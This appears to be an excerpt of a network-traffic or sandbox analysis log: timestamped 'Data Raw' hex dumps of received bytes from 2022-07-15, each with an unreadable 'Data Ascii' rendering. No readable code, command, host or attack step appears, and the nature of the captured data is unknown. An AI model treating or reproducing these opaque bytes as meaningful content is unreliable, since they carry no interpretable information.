78 a3 83 c5 cb 8d 54 4d 85 48 5b 04 06 02 15 cd f2 dd 35 90 ba 88 3d 44 62 8b 60 32 e5 9e 34 4c 3c 36 33 99 0e d1 03 11 6f a4 1e 9d 0a 2f 55 6a 54 c7 2d f9 10 f5 a5 a1 ef 63 ee e6 76 30
                                                                  Data Ascii: 5WrX UZ%~N:Fjii8<+^7-QP0WoRdcYX]m)4Ky(-Ty^@G2D=M>g*?5@2_?!B~vzF<IV9RJaGxTMH[5=Db`24L<63o/UjT-cv0
                                                                  2022-07-15 01:58:20 UTC2170INData Raw: e4 45 1c f9 2f c1 b9 59 c0 81 64 50 ea 7b 70 71 f4 68 d5 e0 98 3b 6d 6d b7 8f a9 ff ec fc f9 9d c9 86 1c c6 25 02 9c 65 2a 21 80 20 0e 12 f7 fb 36 48 db 8c 96 a9 5a 86 26 0c 72 7a cc 6e e2 6e c3 28 84 ef 79 8f 66 3b e2 1a 7a a7 e4 fe cf 4e 7f 9a 37 eb 7a c9 28 29 57 be bc b7 f6 73 73 0d 39 82 78 ef c6 ac 07 2e ac f8 e6 39 8d c8 61 cf 4f 86 45 ff ed 27 84 bf 76 45 91 03 83 f5 d7 d3 ce 8e 58 23 15 1f af ec 73 64 7c e5 43 4a 23 12 0e b3 34 fa 06 6d 65 92 55 d0 c8 f8 73 d4 6d b2 4d f6 42 01 65 c7 b5 b9 43 ef 24 9b 04 e7 44 42 39 c4 5d b3 84 b4 3f 89 0c 29 01 24 b1 39 fc 9a c8 04 d3 57 27 e1 49 c7 79 e0 e5 5c 79 71 5c 7a 90 c9 91 dc 73 f7 b5 9b 67 fa 5e d1 c0 45 82 12 eb c5 c5 b7 22 5e f5 12 c8 c2 42 ef be bc f1 5e 34 b3 02 39 6d 1a fb 61 8a 1d 3f a2 ce 07 24
                                                                  Data Ascii: E/YdP{pqh;mm%e*! 6HZ&rznn(yf;zN7z()Wss9x.9aOE'vEX#sd|CJ#4meUsmMBeC$DB9]?)$9W'Iy\yq\zsg^E"^B^49ma?$
                                                                  2022-07-15 01:58:20 UTC2186INData Raw: 5a bd df e2 4c 67 79 f0 e2 2c a8 e8 a8 b5 f8 43 38 e7 46 21 b4 39 08 6d df f1 c9 d5 c2 32 88 61 04 2f 31 81 c2 e3 12 22 98 b6 65 87 b4 7e c9 7f 51 bb 63 3a fe f2 61 21 2a 2e 03 56 b1 f8 63 95 06 fb a9 b2 62 8c db a7 d9 54 b1 77 8b d6 0a 06 f2 b0 4c 43 f6 a7 a3 b6 7b fb 18 26 4d ab 3a 2a 7f 1a bf 6c 57 8d 5b 80 83 61 65 f7 0a 88 c2 43 00 33 5f 4c 78 10 22 81 ed d2 09 ff 8d fc d1 dc 6c 96 7e 73 59 73 7d fa fe a4 8d bf fd eb a8 41 2e c6 66 99 31 4e 2a 4e fe 13 c6 0f 8c bc 7a 7a 5b ce f3 c6 58 b6 b6 2a 17 63 66 d0 5d 11 fe ea 9a f7 4a 5a f2 7b cf 26 91 8d 5a 14 b5 5f d9 4e df b8 ce f1 37 c1 08 a0 f6 e3 f8 f0 45 5f d3 87 95 0e c9 59 56 40 fe b2 ec 48 d8 3e ef f4 3f df 71 da 5d 55 0f 48 94 9c ec 71 3e bc 7e 66 36 77 4c c9 57 71 cb 58 e7 ea 2c 90 dd 95 2f ce 53
                                                                  Data Ascii: ZLgy,C8F!9m2a/1"e~Qc:a!*.VcbTwLC{&M:*lW[aeC3_Lx"l~sYs}A.f1N*Nzz[X*cf]JZ{&Z_N7E_YV@H>?q]UHq>~f6wLWqX,/S
                                                                  2022-07-15 01:58:20 UTC2202INData Raw: 15 88 43 1c 0b a3 fe b2 ca 56 b7 29 2b 51 84 7a a2 3b a7 b4 e2 66 f5 98 d2 f9 4e 2f 5a f8 4e 95 d3 cc dd 35 cd b1 2a 3c 29 8d 83 1d 87 da a5 45 d5 7d c0 10 e7 8a 7f a3 e1 82 80 eb 08 d4 0c 61 c3 0a da 44 a6 e6 fe 17 3b 9e 22 c9 fd 03 75 32 a7 db 9c a2 de 5e 9b f8 54 99 cd b2 b1 ab 1c 36 65 ed ad 99 78 3d db 7d b0 6f 61 c7 7f 57 3d 15 92 4c 82 7a 8e ce 97 b7 72 31 dc fb c1 cb 92 30 7f 68 fd 5f 4e 15 0c 99 fd 44 e5 e6 4c 65 80 c0 b1 07 e5 75 19 a1 66 68 5c 4f e9 91 ec 9a aa 39 8e aa 70 1b 1c b6 a5 3f bd cc 63 9a 28 a8 1f 3b 3c a5 1d 12 51 ad db 04 43 5a dd d0 6f af ed 48 6f 7a 8e c5 3c 77 28 19 a0 1c f9 41 8e 6c e8 ae 68 b8 39 10 1d c2 90 d8 af 57 93 71 98 53 99 c8 e8 d7 70 d2 dc fb 7a 0e 9a 08 30 b3 da fb c9 b6 97 c6 31 8e b2 fc f6 41 35 21 82 21 9f c2 d0
                                                                  Data Ascii: CV)+Qz;fN/ZN5*<)E}aD;"u2^T6ex=}oaW=Lzr10h_NDLeufh\O9p?c(;<QCZoHoz<w(Alh9WqSpz01A5!!
                                                                  2022-07-15 01:58:20 UTC2218INData Raw: e3 e3 e6 fa ef 71 7d 60 e2 56 94 96 f9 63 7a b2 43 d2 cd 49 37 9f e9 9c cb 5f 19 26 ce fb 44 d1 6e 04 20 fe da 27 c1 c1 0e 2d 9f 66 94 7b 01 cb 12 45 1e b0 4e b9 9e 8b 06 bc 18 c9 44 ed 73 da d1 c0 e6 c3 73 40 41 31 01 f8 54 b7 2b 76 b2 cc c3 7a 9e 61 16 07 15 90 a1 ee 7e 05 8c d6 2e 6a c5 d9 27 b0 85 be a0 23 8a 74 75 3b c0 8e 71 03 29 f8 ad 37 11 2d f6 3f 37 33 51 47 c6 c5 63 2b f3 eb 7c 56 ad 2a 5d 72 e0 62 e9 ae a4 50 5d 8e 37 38 0b ec 17 17 71 9e 3c e7 aa 76 7e 31 82 ff f9 0f 15 a8 ca 97 68 39 d4 7c 6c 5a be 23 88 c4 fe 5d aa 48 d6 a2 c2 77 dc 6e 9f cd 22 ba 64 8f e6 57 4f 00 c9 7f 15 e5 63 0d 83 7b 84 aa ef 51 89 86 58 52 8f 62 a5 0e 82 1b 65 19 4d 46 b8 e1 54 f6 70 22 37 79 ce d9 5c e9 9c 79 51 21 8a 50 65 b4 33 65 ed b7 ba b2 f3 be 7c aa 0a 06 a8
                                                                  Data Ascii: q}`VczCI7_&Dn '-f{ENDss@A1T+vza~.j'#tu;q)7-?73QGc+|V*]rbP]78q<v~1h9|lZ#]Hwn"dWOc{QXRbeMFTp"7y\yQ!Pe3e|
                                                                  2022-07-15 01:58:20 UTC2234INData Raw: ba 17 f0 46 95 74 9a 8f 5e 6e 74 f9 5e 7c 77 0e 83 ea 5c ef 3b 9e 31 e4 e7 77 8d 2c f9 c5 6e 7e 15 56 72 a5 78 c9 5d 12 02 1a 32 c4 6b a3 b2 25 3e df 53 bc 58 f0 cd 5f 30 45 97 b7 21 b2 cd cd c2 63 19 df c2 4d 36 53 24 46 5d 12 e3 3d b8 32 91 b8 5e 57 fd 6e 73 05 bd 93 43 b8 ec 53 ed 50 18 cc c1 f9 c7 f5 cf e6 b7 7f 51 55 93 bf bc 18 5c 02 af 7c 2b 06 0f 2c 93 95 55 c1 6f d4 86 03 32 7f 58 a2 df 81 b5 26 37 f5 fa 43 f3 17 6f 4e 06 06 20 be e3 3c ba 3c 59 0a 15 1d 33 f9 00 55 22 4d 9c 30 78 70 a1 f4 cd 24 83 2a 32 1c b0 78 eb 3b 9e 5a 60 f4 90 7e 9c 5b 18 84 23 3d 6f 39 5f 64 64 63 65 43 81 21 6e fe aa 78 fc 40 d4 8f a6 a4 53 c0 66 d0 86 91 69 ff db 81 32 dc 7d bf 39 3c 20 86 e9 d7 08 d6 71 2b f3 66 2e 32 a5 bb 22 1a 44 33 d6 c4 2e 79 cb 1f 8e 55 7f f2 75
                                                                  Data Ascii: Ft^nt^|w\;1w,n~Vrx]2k%>SX_0E!cM6S$F]=2^WnsCSPQU\|+,Uo2X&7CoN <<Y3U"M0xp$*2x;Z`~[#=o9_ddceC!nx@Sfi2}9< q+f.2"D3.yUu
                                                                  2022-07-15 01:58:20 UTC2250INData Raw: 6f fd 28 57 f1 98 65 5e ab aa 10 0a f4 c6 f5 c3 a2 86 49 70 56 a0 1b 9b bc 9e e0 11 23 58 e1 bf 8b 16 a0 7e 64 50 72 d3 0b d6 13 06 42 b9 7c f2 2f 09 0b 81 c2 ab 11 28 1e 59 23 1c c3 e7 ae 4f 3e 11 71 ba cb b7 2a e6 8b 9a 21 9d f4 56 83 1a 8e a1 c9 5d a2 6a b6 49 d3 30 61 e0 dc d9 66 b6 20 4f 20 2e 50 81 f3 b7 7b a2 61 77 9f 40 1a d3 e0 43 15 08 35 74 b2 4b 9b f0 c4 9a 53 af 2d 60 2b e1 42 bb 10 51 c2 cc ba 09 7e aa 50 4f 9a 27 06 34 83 57 29 62 67 c8 14 b6 61 ee d3 c9 e7 cc 11 d4 0c f8 d9 bf 22 bb 91 89 7a 45 4e de 76 89 1c 0e 3d 38 84 d8 17 f9 6d 02 d1 90 09 af f5 86 53 2d 29 9f 94 35 5b 62 d9 72 83 31 65 91 8f f7 ce a8 1f 4d f1 52 8d ee 26 30 3c 3a 3d 21 c2 e4 37 9b c8 c4 32 3b 81 93 54 db d3 c8 5f 30 1e b5 44 4d 0e 25 44 14 ef 3e 90 69 8a 4a 76 54 b6
                                                                  Data Ascii: o(We^IpV#X~dPrB|/(Y#O>q*!V]jI0af O .P{aw@C5tKS-`+BQ~PO'4W)bga"zENv=8mS-)5[br1eMR&0<:=!72;T_0DM%D>iJvT
                                                                  2022-07-15 01:58:20 UTC2266INData Raw: 6e 19 35 51 42 fe 5a f9 e7 6e f2 d8 45 f2 c7 72 bf 85 11 97 97 dd dd 3c 18 d3 d7 10 29 e8 3e 82 b7 8c c9 f9 c2 2b 40 7c 34 fd 5b 3b 21 cb 13 19 32 af 2d d9 b9 9b 6a b0 35 c2 56 fa ca 14 b7 20 4e 49 16 d7 3c e5 96 f8 33 2d b2 f1 df 46 14 f6 cb 75 1a d9 8b 56 fd 99 31 1e ec ec 0f a6 b7 9b f9 5a 3d 9c f3 38 a0 50 f5 4c cb 0e fc a2 2e 33 9c 26 e6 04 56 b7 43 c4 b6 9f a6 f6 6a ba a7 64 e1 31 00 5a 46 ed d9 b1 88 51 7f d2 3b 5b 99 14 96 95 54 cd 97 eb ff a6 0f d6 5d 89 f7 dd bd 9a a5 42 8d 54 85 36 d6 85 fd ce 8a 07 cc f9 af c3 a6 75 d2 e2 a2 25 96 c9 e3 12 15 39 f7 95 e9 b1 0b 64 f7 ac bc a8 e8 ea 27 86 61 71 83 5d f9 60 d2 08 b2 9e d5 12 41 52 e5 1a e6 fa 81 d4 39 4d e4 5c 73 13 f5 5c 63 ab 41 a9 86 11 bd fd 12 5c b1 23 a4 e4 f9 8c 64 84 a3 ec 96 0e 67 3b 0c
                                                                  Data Ascii: n5QBZnEr<)>+@|4[;!2-j5V NI<3-FuV1Z=8PL.3&VCjd1ZFQ;[T]BT6u%9d'aq]`AR9M\s\cA\#dg;
                                                                  2022-07-15 01:58:20 UTC2282INData Raw: 07 6b f6 c2 26 98 f3 4f ba 6c 35 30 11 9e 66 5f f4 f4 3c a9 02 29 d9 ca ce 90 cf e9 3c 72 a6 df a2 cf 1c e0 e7 1b f7 a1 f3 83 53 0b 2c 17 44 c5 24 ff 9b 48 6e 08 eb 0b 06 64 d7 0d fc 7a 04 9d bb 26 7d 72 80 1f 97 eb 12 bb 27 6c 41 13 0f e5 51 78 51 f6 f6 f4 85 46 23 fd ef 47 dc 50 f4 09 5b 5a 1c 7a d1 af 0d d2 01 f4 a3 a8 69 59 43 f7 92 38 ad a9 f1 ba ad d1 bf a3 c9 20 9a 75 28 25 d0 7a 29 9b 04 12 81 93 2d c7 47 a5 1d 39 96 5c 82 f9 48 8f 38 44 df 44 53 40 0f 52 b3 18 2e 81 ed 06 cd be fe b2 2b 8f b2 05 db 3e 6f 46 06 0c ca 5c d6 cf 3f 22 86 49 d4 9a a4 a3 8f 90 6c 61 cd b7 d3 37 09 01 d7 6e 28 2a 5b 8b e4 53 61 3d d4 8e 88 6d 80 b0 c2 99 6f a7 f0 cd 42 4a c6 ea 8c f0 9a cc 93 ea b8 c8 53 e0 8c 1b b9 22 90 fa 03 63 f0 e3 13 10 a7 b3 2c 5a 87 e3 29 a9 33
                                                                  Data Ascii: k&Ol50f_<)<rS,D$Hndz&}r'lAQxQF#GP[ZziYC8 u(%z)-G9\H8DDS@R.+>oF\?"Ila7n(*[Sa=moBJS"c,Z)3
                                                                  2022-07-15 01:58:20 UTC2298INData Raw: 2b d8 1c 05 35 3c 9b 33 ef b4 9f 41 0c f9 a7 cf 1e 51 9a d3 8b 73 4a 21 7a d5 f4 9d e8 56 89 a4 39 3d fe 4a 3e 88 0f 72 60 b3 15 4e ae 24 04 b2 94 0b 43 6f b9 fb 80 4f 82 00 b5 2f 44 64 e0 db 99 2f cb 7f 6e 62 56 41 5f 07 aa 04 11 f4 e0 a8 29 75 2d ba 94 cb ec 70 22 b3 c1 5d 18 53 31 3f 94 fa 8d f3 af 85 68 15 32 59 9e 30 ee 26 82 9f 1b 83 4e fe 65 26 0b d1 8d 35 fa 81 b3 c0 e5 88 d2 da 2d 11 94 95 1e 23 61 18 90 ba 69 a7 b8 97 3b c3 a2 53 de 60 e0 a0 41 91 84 38 bb 87 00 51 ef 5d d3 ea 10 a0 8e 56 b6 04 4d 12 fa 5c 9d eb 78 dd b2 0a 34 9a 60 e5 45 26 14 a2 55 81 19 c9 b3 b5 50 dd 1c 55 78 38 37 23 8d a3 f7 93 17 24 07 68 01 ac a4 21 a1 00 2f 25 e1 68 9b 6e 77 70 b0 85 cd 28 d1 ac f8 bb f7 f4 32 00 d4 93 e1 ce de ba ce 8a e5 40 a0 ef 27 86 52 3b 1f 9d df
                                                                  Data Ascii: +5<3AQsJ!zV9=J>r`N$CoO/Dd/nbVA_)u-p"]S1?h2Y0&Ne&5-#ai;S`A8Q]VM\x4`E&UPUx87#$h!/%hnwp(2@'R;
                                                                  2022-07-15 01:58:20 UTC2314INData Raw: 26 41 03 d0 8d b5 8c 45 75 3c 6d 88 be ea 9e 3d c2 e6 56 02 21 a6 ac 1c 69 47 fc 83 1f 84 c7 be e0 1c e6 4c ac 22 29 2f 5d 28 df b6 1b 9d c2 20 7e 83 92 2d 6d 85 5a 55 e8 9a 74 09 19 5f 81 7e 3a c0 e7 cd b9 17 9b b9 10 6d 13 51 ca 4d 9e 7b 34 f7 c1 bc e3 81 3f 40 95 1d 7c b7 39 8e a9 38 b7 51 25 e4 fd 3a 17 f3 a7 72 fb 37 23 fa a9 02 c4 55 1b 75 e8 39 f8 f7 8e a8 c5 ec 7a 98 f6 2c af 87 60 72 76 73 ca de bc b0 be 1d 90 41 fe 99 a8 52 e9 97 85 10 3d ec 79 ef 1a 77 46 ec 2c 41 74 f0 3e bf 08 af ef aa cd f5 a7 3d 25 ba 1d ba 50 a1 80 81 91 df f4 86 6e 0a 40 2c cb 93 d4 cb 94 fd c2 fb 52 46 0a 84 ed 07 da 2a d9 67 b8 3c 4e e2 4b 78 aa 0e 0e ab a1 8c 69 4f df c5 97 f9 08 5e 32 66 0f 31 fb b3 ac fb d2 b6 1a 09 df 7d bc e1 d1 87 c5 ac e4 d4 0c b7 a4 09 6d 01 62
                                                                  Data Ascii: &AEu<m=V!iGL")/]( ~-mZUt_~:mQM{4?@|98Q%:r7#Uu9z,`rvsAR=ywF,At>=%Pn@,RF*g<NKxiO^2f1}mb
                                                                  2022-07-15 01:58:20 UTC2330INData Raw: 8b 8a 4f f8 a4 8d d8 7b 79 23 b1 dd 87 fa cc de 92 58 f5 e2 52 d2 98 35 0a 58 9e 74 14 9e cf 2d d0 1d 37 79 3e d9 30 05 ca 23 16 dd 4d c1 ed 38 cf d4 36 01 a9 57 d7 97 88 24 95 7d d7 e1 e4 af db a0 86 45 aa 7e 09 44 06 48 eb d6 c6 12 70 2e 75 01 0f f3 6c ae 74 ba 3c 6c bd 97 e4 db 91 b8 66 42 41 fe 3c c0 92 a2 58 40 0a 92 ac 0d 9a e5 6d 05 68 74 ad fc 7f 72 a8 a4 06 8a 0d 23 16 31 19 9a cb 87 c0 ac f4 1e f0 a9 97 e7 4f 5e 30 b6 ed 2e a6 08 86 28 47 27 e3 60 57 05 3e ea 8a d1 74 59 42 de 6e f6 8e d9 ae 41 b6 56 3d 6a 90 85 76 be 34 f8 65 d7 ea fd 96 1e e9 4d 5f 39 bd f9 a6 45 84 6d 25 f2 50 4b 5c 8a 60 2d 74 ea 8e b9 49 d6 6d 19 d2 60 c5 1c 9b 1a 20 02 3f 72 83 34 96 7e 3d 94 91 3c 00 9c 3d 5d 3f 8a b9 ce 42 74 7a 30 16 7b 0c 24 1b 68 c4 28 83 32 d3 85 97
                                                                  Data Ascii: O{y#XR5Xt-7y>0#M86W$}E~DHp.ult<lfBA<X@mhtr#1O^0.(G'`W>tYBnAV=jv4eM_9Em%PK\`-tIm` ?r4~=<=]?Btz0{$h(2
                                                                  2022-07-15 01:58:20 UTC2346INData Raw: fc 1b a1 8e b2 7a c5 fc 9c cd 96 18 6f b3 b0 7f f5 d9 c9 76 7a 05 f4 21 c4 28 6b 5e 35 6e 80 fe a1 1c 1f 52 53 bf 9a 75 97 65 45 25 eb 12 eb 5e 14 b2 38 72 38 25 9e 9b 41 58 1b e2 b2 da 08 ad f2 2c 98 4f 8d 37 7a 41 6c 72 1b b9 d8 73 e4 13 cc 45 1f 89 30 34 2a d2 64 69 97 a4 1e cd 13 03 c6 83 fd 70 96 71 38 d8 07 91 b1 44 d1 7d e9 63 8e 24 6d b9 2d f5 89 88 ad 61 04 f4 af a5 c4 b9 68 14 4a 2e 24 5c 29 33 a8 77 eb 7f 34 29 d6 d7 f9 cd 92 f9 bd d4 49 de 13 61 2f 55 8d fa 0b 1e e5 ea 10 ec f3 b4 70 0d d5 53 36 95 16 b3 7b 6e 53 9b 7c 3b c0 40 6a a9 d1 49 cc 28 f1 51 a4 0f 18 45 e6 da 50 2f 75 c1 db 48 17 85 ef 7d ab 40 db 65 ec d6 42 c4 94 1a 9c 93 80 33 77 af b3 64 0f 08 d3 7a c8 10 ee 68 2c 88 68 f9 23 ad 12 ad 6b a2 19 19 f3 49 ac 79 48 7e 0b 5b 3a 3f 9e
                                                                  Data Ascii: zovz!(k^5nRSueE%^8r8%AX,O7zAlrsE04*dipq8D}c$m-ahJ.$\)3w4)Ia/UpS6{nS|;@jI(QEP/uH}@eB3wdzh,h#kIyH~[:?
                                                                  2022-07-15 01:58:20 UTC2362INData Raw: 00 75 fd 13 42 2b 7e 95 8d b5 c1 69 c2 12 43 71 73 5e 4e 10 31 12 c8 18 37 76 bc 6b 3f 48 5f 2c 9d ef 90 89 77 8f 33 fc a3 92 1f cb a1 11 b9 7f 62 27 d3 5b f4 11 6e e5 2e f6 cb 20 3d 87 50 21 5c 10 84 26 50 59 5a 02 2a dc ce 49 ff d0 e9 ed 2b 1b d0 6c 7d 14 2e 2d 2c 1c d9 7d 1c 09 6e fa fc 30 ba 66 4c fb 65 3b 4e 27 06 32 68 d1 c8 f6 92 c5 3b a1 0f 03 d8 d5 27 d4 28 a4 42 bb 38 b7 09 20 e2 86 b7 41 ef 5d 6e 66 a8 63 41 60 69 ae 76 bb c2 d6 18 b3 dc 13 4b 71 96 75 a5 1c 4d 31 63 c4 ee cd 31 86 43 c6 b7 50 84 6f 3d 22 ef dd 23 64 41 8d e5 b0 fb f8 39 d2 19 e0 05 96 ce 12 f6 1b c3 c0 95 3e de d7 98 24 7c 47 30 e6 2e ca 9d c9 72 1a fa ea 02 5b ee a5 76 62 39 5b 34 53 60 ad c6 f9 0d c0 62 fe b2 1e 49 4c 40 67 66 6c 0e cd c3 3f 55 4d ba 49 39 0b 08 f3 87 ab 71
                                                                  Data Ascii: uB+~iCqs^N17vk?H_,w3b'[n. =P!\&PYZ*I+l}.-,}n0fLe;N'2h;'(B8 A]nfcA`ivKquM1c1CPo="#dA9>$|G0.r[vb9[4S`bIL@gfl?UMI9q
                                                                  2022-07-15 01:58:20 UTC2378INData Raw: 80 67 bf 11 94 fb 4e bb 1c d4 04 58 f4 e1 a4 09 ed e5 c7 78 b3 0c 8c 75 3c 0e 35 c9 26 7a d8 c0 0d 5d 0d 93 a1 b8 64 a3 77 c6 64 fa b9 ff 54 30 f1 03 9e ae cc a3 ad 1b e9 3c 94 c1 33 31 de 15 16 cf 61 34 11 7f 70 ca 89 45 fa 82 b1 4b a9 18 92 3e 39 2f d8 23 39 be 3e f0 56 45 cb 69 0e 80 55 26 64 52 01 f9 14 6f d0 f4 a5 fa 44 8d 65 b6 ae fb 12 4c e0 d7 b3 da 70 56 bf 10 6d 17 4f 15 9c 9f 76 64 fd 04 09 73 37 95 fc cf 27 6a f8 7a 37 e1 65 88 e7 a9 c0 8a fd 74 7a 13 57 93 9e e0 e8 89 7d 0f f6 44 f9 cb 47 0b 7d 5e 03 c6 fc c9 d8 f4 d0 0b 7c 67 45 bf 6f 61 5f 1f e4 fc 07 87 85 ae c4 de b5 c8 38 56 04 b4 1e 27 19 b8 3f 3b d0 5b 97 13 b0 d5 0c 96 7e c7 ed 32 16 a5 85 8f 0f c5 72 8b d2 bb c7 91 d1 54 a7 c4 14 90 cd 84 2d 96 cc 46 ad 77 8f 53 35 ec 30 b8 75 5f 51
                                                                  Data Ascii: gNXxu<5&z]dwdT0<31a4pEK>9/#9>VEiU&dRoDeLpVmOvds7'jz7etzW}DG}^|gEoa_8V'?;[~2rT-FwS50u_Q
                                                                  2022-07-15 01:58:20 UTC2394INData Raw: 05 19 b5 9f 13 4d fb f5 9c 27 e3 7d 50 5f f6 0e ce 89 bd f1 78 f4 b7 00 d7 01 86 73 d9 4b ec 1a b6 40 3d 9f 94 5b 70 50 79 98 bf 52 33 f9 4b 48 96 d4 ab fc c7 a7 88 3d 8e a7 e2 5e 0a fc 0d ac db 0a ae db 74 a2 74 1d 3e 27 a9 d2 92 4a 60 60 f8 c8 a8 b4 f2 ee 43 42 bb 0c ab 2e 02 08 21 9d 42 eb 21 37 c0 65 e0 e1 6b 92 e8 c4 50 0a b8 73 f8 7d 91 bd 0a 4d 9a f2 11 8a a6 21 81 c1 93 eb 59 cd 93 62 c2 6b 13 4d 40 f2 3a 8d df 38 5d 3c ac 79 25 db 51 c1 30 93 46 9f 5a 63 f5 00 f5 e1 01 e5 d9 95 57 b1 78 3b d6 24 cf c0 f2 95 38 34 54 81 09 57 87 0e e7 4b 1d 9a 77 6d 0c 02 3a 55 dd 69 1b 17 39 5b d2 6b 87 14 2b fc a2 f0 42 ce 02 a8 92 e4 e5 a0 68 0e 33 9f 30 3f 05 d8 bc 57 e9 db 4b 2b 15 fd d1 62 be 61 eb 99 c7 b8 6b bf b7 d2 82 2b 4b 0c 7b e5 e3 94 e6 00 06 88 56
                                                                  Data Ascii: M'}P_xsK@=[pPyR3KH=^tt>'J``CB.!B!7ekPs}M!YbkM@:8]<y%Q0FZcWx;$84TWKwm:Ui9[k+Bh30?WK+bak+K{V
                                                                  2022-07-15 01:58:20 UTC2410INData Raw: 17 c5 ae 7a be 67 aa 57 59 32 aa fb 4a 43 3f d7 de f6 02 1d 88 93 a8 39 8b d0 5f a4 d0 44 46 d8 bc fd a1 51 35 71 e7 fd 08 ba 9d dc d0 bf 17 85 5c cd f8 86 68 cc 85 73 75 3a f7 9a 73 7b 95 fe e6 7c a4 ef e4 29 5a 03 4b 41 58 cb d2 6a d7 eb 1e ae be c6 53 35 cb 4e ab cd 1c 39 26 55 92 a8 0d ea 22 c5 25 4d 97 01 47 b6 95 85 fb 4e 86 a7 c1 4a a6 52 09 40 42 fb 6a 80 41 74 8d 5a 17 0d 24 50 20 7b d6 c6 29 73 25 72 87 87 15 72 32 56 01 56 8f 7b 73 37 b4 d3 d4 3f 09 db 51 e6 30 0a ae 82 9f 4f 46 f3 86 41 27 a3 d3 a6 c2 40 cf 39 47 1b bd 7b 84 4b ad 8d 56 a2 2e 55 7f e2 7d c4 c8 9e 48 60 34 4d 08 cf 95 cb 3f d1 44 c0 d6 1d 6a c1 fb 44 ae f8 82 8a 11 a9 73 12 6c 82 d8 2e 5d 80 9c 8a dd a4 19 06 aa e0 9e c6 ae 39 a9 bf ea df f5 32 c4 5e bc d0 54 d2 6b 7b 13 c0 ea
                                                                  Data Ascii: zgWY2JC?9_DFQ5q\hsu:s{|)ZKAXjS5N9&U"%MGNJR@BjAtZ$P {)s%rr2VV{s7?Q0OFA'@9G{KV.U}H`4M?DjDsl.]92^Tk{
                                                                  2022-07-15 01:58:20 UTC2426INData Raw: 65 8e cb 03 a2 61 6f ea b1 d3 78 9b b4 c2 3a 56 2e 5a 8e 53 3e e5 31 f3 b4 ff 3d d8 17 a5 c8 f8 0c 3b 2b 81 74 9c 95 8b 20 81 d2 41 1a 29 ca 81 65 e8 81 ae bd db c6 bd 9b 73 bb 6c 0f ca 56 37 75 8c eb 9a 2e 88 e3 ab a1 73 69 0a d0 15 35 92 f2 e9 86 a0 1e 7d 24 b1 ea 1e ba ee 72 ce 65 3f 6c 69 24 a3 f9 04 47 d8 7f 43 be 3f 81 83 18 25 97 56 eb 58 4a fc 1c 98 22 8d 29 bb 12 19 b0 28 f4 89 1f 0b d5 7d ed 08 74 de 8d d9 10 02 a1 cc 41 56 4d ef cc f2 e5 79 5b ba dc 74 c4 e4 20 d0 32 c4 6d 77 ea 99 36 18 cc 4f 28 ac 28 23 4b 5a ce 8c 1f 00 6d 22 06 d0 a0 c7 5e b1 4f e5 92 d6 0e f7 4b 1c b7 1d 54 24 4d c6 61 8b c7 47 c1 ad 07 25 d3 4d 32 49 85 90 04 52 39 6c ff 13 bf ab 46 7e 86 1f 89 63 a1 bf c3 ab 8b f7 ab 74 99 df be a4 6b 1b 9d f4 e5 ef 12 6e bd f5 fe 95 c9
                                                                  Data Ascii: eaox:V.ZS>1=;+t A)eslV7u.si5}$re?li$GC?%VXJ")(}tAVMy[t 2mw6O((#KZm"^OKT$MaG%M2IR9lF~ctkn
                                                                  2022-07-15 01:58:20 UTC2442INData Raw: c5 bf 70 da 7e d3 9b 9f c8 a7 43 36 e0 c4 47 a3 30 a9 ab 89 d1 5d 8a 19 55 fc eb 7a 2c 27 4e ff fe 9b c1 df 09 c8 2e 12 08 89 b4 39 52 b0 d8 32 a5 d0 f2 fb 4a f8 d7 b6 c9 fe 29 1c 46 d3 9b d2 be 8a f1 4e af 63 f1 8a a9 c1 ac 4f fe 37 c4 bf 14 76 f9 a3 d3 a6 aa 5f db 93 3e fa d2 18 c2 21 3a ec 34 d8 73 ff c6 0a 5d bb 98 31 87 05 77 50 a2 a1 42 d5 2d 21 16 d9 7b 87 b0 3b 95 89 a7 2b 65 d4 ee 44 a0 02 9f 92 07 28 86 a1 b9 3f ea ac a9 a3 82 46 f4 fb 44 53 ae 16 71 92 49 0c 4d 5c 8a e9 a7 b8 f1 7a f8 c3 66 22 fa b7 45 b5 69 35 4c 05 57 0a e9 04 56 54 8f 99 61 bc e4 73 5e 50 95 43 8d 37 41 6e e3 8b 9c 42 3d f8 26 12 46 ff 74 9e 52 55 51 f9 eb bb 77 06 87 28 80 33 9b 7a 79 22 b8 8c 1a e4 ad 7a b2 00 13 15 c2 a1 59 5b ef 14 ae c5 a5 b4 48 23 c3 5a 14 be 63 e7 96
                                                                  Data Ascii: p~C6G0]Uz,'N.9R2J)FNcO7v_>!:4s]1wPB-!{;+eD(?FDSqIM\zf"Ei5LWVTas^PC7AnB=&FtRUQw(3zy"zY[H#Zc
                                                                  2022-07-15 01:58:20 UTC2458INData Raw: b0 a5 53 b7 1e f5 31 dc dd 75 4b 96 39 e8 29 40 76 eb 11 55 5a e1 0b 7d 58 4d e1 6c 15 6a 61 b3 3e ff fa 45 84 aa 85 6f a0 a4 01 5c 31 5f fa dd 4b e7 82 d4 f5 c3 b4 fe e9 f2 dc 0d 5a 20 4a 5a 84 4a 43 fb 67 b6 6f c3 bb 2b b7 51 c2 b5 8d 7f df 97 55 0a bb 23 41 7e 12 fb e6 5e 98 64 6d 3d 2e d0 7c b6 7b 15 6b bf 65 52 45 91 d9 8b a8 b6 91 5d e5 87 66 d8 fd d7 13 6f b8 23 9c 41 ae bd 9f d5 84 45 be 37 4e 7f 40 40 c4 cd 66 94 af ee cf 42 d9 b7 39 0c 7c 8c 64 8f 2b 3b 6d f0 14 c1 a2 b4 66 73 5c 71 c6 7b eb 01 d1 87 23 67 67 91 f8 b3 fd dd 08 05 2e 06 f9 a2 8e b3 f4 dc a7 22 90 7d 87 15 17 cb ca 64 ff 89 6d ca f7 6e 1f 7e 5b 9b 83 a5 ad c9 dc d3 9b 15 84 89 79 a9 74 c6 6e 05 59 79 0e 00 e0 0f 12 3e b6 1d bb 88 56 cd 9d 17 82 1d b2 8e 7e 9e f8 77 7b f2 c3 f2 39
                                                                  Data Ascii: S1uK9)@vUZ}XMlja>Eo\1_KZ JZJCgo+QU#A~^dm=.|{keRE]fo#AE7N@@fB9|d+;mfs\q{#gg."}dmn~[ytnYy>V~w{9
